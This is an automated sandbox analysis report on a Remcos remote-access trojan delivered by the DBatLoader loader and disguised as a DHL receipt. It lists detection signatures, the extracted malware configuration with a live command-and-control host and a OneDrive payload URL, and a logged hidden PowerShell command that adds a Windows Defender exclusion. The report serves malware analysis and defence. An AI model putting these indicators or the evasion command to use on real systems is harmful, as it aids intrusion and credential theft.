Windows Analysis Report
DHL119040 receipt document,pdf.exe

Overview

General Information

Sample name: DHL119040 receipt document,pdf.exe
Analysis ID: 1471440
MD5: 0db7fbc1b1d0af0a9503401691f95e30
SHA1: e93bb010d9df4bb5df8203429d228d4748976747
SHA256: f2df2225b522198984f1c38654f2d06f2855a0efc8c57d87f566ea21e5c68cab
Tags: exe, RAT, RemcosRAT

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: DHL119040 receipt document,pdf.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}
Source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: DHL119040 receipt document,pdf.exe Virustotal: Detection: 18%
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_2DA73837
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A48C8 CryptUnprotectData,connect,CreateEventW,CreateEventW,WSAGetLastError, 5_2_2D5A48C8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A6A63 LoadLibraryA,GetProcAddress,CryptUnprotectData, 5_2_2D5A6A63
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B14F5 SetEvent,CryptUnprotectData,inet_ntoa, 5_2_2D5B14F5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 5_2_2D5D3837
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 20_2_00404423
Source: DHL119040 receipt document,pdf.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA474FD _wcslen,CoGetObject, 0_2_2DA474FD
Source: C:\Users\Public\ger.exe Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
Source: DHL119040 receipt document,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 
00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 
00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_028A58B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2DA4BD37
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW, 0_2_2DA4783C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_2DA4880C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_2DA59AF5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49665
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2DA4C34D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2DA5C291
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49253
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_45BC10F1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 5_2_2D5AC34D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 5_2_2D5ABD37
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 5_2_2D5A9665
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose, 5_2_2D5A880C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW, 5_2_2D5A783C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 5_2_2D5ABB30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B9AF5 FindFirstFileW, 5_2_2D5B9AF5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 5_2_2D5BC291
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 7_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 7_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 7_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 7_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 11_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 11_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 11_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FF7689D7B4C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_2DA47C97
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\

Networking

Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49736 -> 23.227.203.18:44577
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 23.227.203.18:44577 -> 192.168.2.4:49736
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8
Source: Malware configuration extractor URLs: jantasagasa.duckdns.org
